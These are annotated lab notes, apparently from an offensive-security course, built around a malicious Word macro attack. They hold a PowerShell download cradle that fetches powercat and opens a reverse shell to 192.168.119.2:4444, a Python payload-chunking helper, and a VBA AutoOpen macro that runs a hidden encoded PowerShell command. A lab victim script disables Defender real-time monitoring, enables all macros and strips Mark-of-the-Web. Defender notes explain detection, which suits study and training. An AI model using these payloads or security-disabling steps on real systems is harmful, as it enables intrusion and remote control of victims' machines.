# Stage-0 download cradle as shown on the page: System.Net.WebClient fetches powercat.ps1
# over plain HTTP from 192.168.119.2, IEX executes it in memory (nothing is written to disk),
# and powercat then connects back to 192.168.119.2 on port 4444 (-c/-p), with -e presumably
# attaching a powershell process to that connection.
# Defender note: because no file touches disk, file-based AV has nothing to scan; the controls
# that see this stage are PowerShell Script Block Logging (event 4104), AMSI on the decoded
# script text, and egress filtering of unexpected outbound connections such as TCP/4444.
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell
# Helper that splits the (long) encoded PowerShell command into fixed-size pieces and
# prints one `Str = Str + "<piece>"` VBA statement per piece, so the macro below can be
# pasted without hitting the VBA line-length limit the page mentions.
# NOTE(review): `str` shadows the Python builtin of the same name; harmless here but
# easy to trip over if the snippet grows.
str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwA..."  # payload truncated on the page
n = 50  # characters per VBA line
for i in range(0, len(str), n):
    # the last slice is simply shorter when len(str) is not a multiple of n
    print("Str = Str + " + '"' + str[i:i+n] + '"')
청크화(문자열이 너무 길면 오류가 발생)
' Auto-exec entry point: Word runs AutoOpen when the document is opened (legacy name,
' kept alongside Document_Open below so either trigger works). It only forwards to MyMacro.
' Defender note: a document whose only macro bodies are AutoOpen/Document_Open
' wrappers around a shell launch is the pattern mail/document sandboxes flag first.
Sub AutoOpen()
    MyMacro
End Sub
' Event-based equivalent of AutoOpen: fires when the document opens and forwards to MyMacro.
Sub Document_Open()
    MyMacro
End Sub
' Rebuilds the PowerShell command from the 50-character chunks emitted by the Python
' helper above and runs it through WScript.Shell. The -enc argument is the Base64 of the
' UTF-16LE one-liner at the top of the page (the visible prefix "SQBFAFgAKABOAGUAdwA"
' decodes to "IEX(New").
' Defender note: the resulting process tree (WINWORD.EXE -> powershell.exe with
' -nop -w hidden -enc) is what most EDR / Sysmon event 1 parent-child rules key on;
' the string concatenation itself does not hide anything from script-level logging,
' since the command is fully assembled in memory before Run is called.
Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
    Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
    Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
    ' remaining chunks are elided on the page; the "..." below is not valid VBA
    ...
    Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMgAgAC0AcAA"
    Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA"
    Str = Str + "A== "
    ' WScript.Shell.Run spawns the command as a child of the Word process
    CreateObject("Wscript.Shell").Run Str
End Sub
applications_install.ps1
# Returns the IPAddress of every interface address that starts with 192.168 .
# May yield more than one value, or $null when nothing matches: an empty filter result
# is not an error, so the catch only covers Get-NetIPAddress itself failing (presumably
# the NetTCPIP module not being usable early in boot, hence the 22 s wait-and-retry).
# NOTE(review): cmdlet errors are non-terminating unless -ErrorAction Stop is given, so
# it is not certain the catch is ever reached; and a failure of the retry is not handled.
function Get-IP {
    try {
        return (Get-NetIPAddress | Where-Object { $_.IPAddress -like "192.168*"}).IPAddress
    } catch {
        # single fixed retry after a delay
        Start-Sleep -Seconds 22
        return (Get-NetIPAddress | Where-Object { $_.IPAddress -like "192.168*"}).IPAddress
    }
}
# Lab-VM bring-up: block until the machine has left the 192.168.50.x (build) network,
# then, if its address differs from the one the image was built with, install Office
# from the bundled image unless Word is already registered.
$old_ip = '192.168.50.198'   # address the image was built with
$third = 50                  # third octet; 50 means "still on the build network"
$octets = ""
# Poll every 15 s until the third octet changes.
while ($third -eq 50) {
    $curr_ip = Get-IP
    # NOTE(review): if Get-IP returns $null (no 192.168.* address yet) .Split throws and
    # the script dies here; if it returns several addresses, member enumeration splits
    # all of them and $octets[2] is the third octet of the first address only.
    $octets = $curr_ip.Split('.')
    $third = $octets[2]
    if ($third -eq 50) {
        Start-Sleep -Seconds 15
    }
}
$local_ip = Get-IP
# NOTE(review): with several addresses -ne yields the filtered array, which is truthy
# whenever at least one address differs — confirm that is the intended check.
if ($local_ip -ne $old_ip){
    # Instantiating Word's COM object throws when Office is absent; the catch installs it.
    try { (new-object -comobject word.application).version}
    catch {
        Mount-DiskImage -ImagePath C:\tools\Office2019.img
        # presumably the image mounts as E: — the drive letter is not guaranteed; verify
        E:\Office\Setup32.exe
        # ~33 hours; keeps this script (and presumably the install window) alive — confirm intent
        Start-Sleep -Seconds 120000
    }
}
applications_exec.ps1
# Loop for doc file and execute MyMacro
# Victim simulation for the lab: when a ticket.doc appears in the webapp upload folder,
# open it in Word with the macro protections switched off so its AutoOpen/Document_Open
# macro runs, then delete it.
# Defender note: in a real environment each step below is itself a high-fidelity alert —
# real-time monitoring disabled via Set-MpPreference, VBAWarnings set to 1 ("enable all
# macros", no prompt) under HKCU, and Unblock-File stripping the Mark-of-the-Web — and the
# registry/Defender changes are not reverted afterwards.
If (Test-Path C:\Users\Administrator\Documents\webapp\ticket.doc)
{
    # Bail out while the Office installer started by applications_install.ps1 is still running.
    $setup = Get-Process Setup32 -ErrorAction SilentlyContinue
    if ($setup) {
        exit
    }
    # Word is started once and killed below — presumably to get first-run setup out of the
    # way before the document opens; confirm. NOTE(review): without -ErrorAction Stop a
    # Start-Process failure may be non-terminating and never reach the catch.
    try { Start-Process WINWORD } catch { exit}
    Set-MpPreference -DisableRealtimeMonitoring $true
    Start-Sleep -Seconds 10
    Stop-Process -Name "WINWORD" -Force
    # VBAWarnings = 1 enables all macros for Word 2016/2019 (16.0) without notification.
    New-ItemProperty -Path Registry::HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security -Name "VBAWarnings" -Value "1" -PropertyType DWORD -Force
    Move-Item -Path C:\Users\Administrator\Documents\webapp\ticket.doc -Destination C:\Users\Administrator\Documents\ticket.doc
    # Removes the Zone.Identifier stream so Word does not open the file in Protected View.
    Unblock-File -Path C:\Users\Administrator\Documents\ticket.doc
    Start-Process -FilePath "C:\Users\Administrator\Documents\ticket.doc"
    # Give the auto-exec macro time to run before removing the document.
    Start-Sleep -Seconds 20
    Remove-Item C:\Users\Administrator\Documents\ticket.doc
}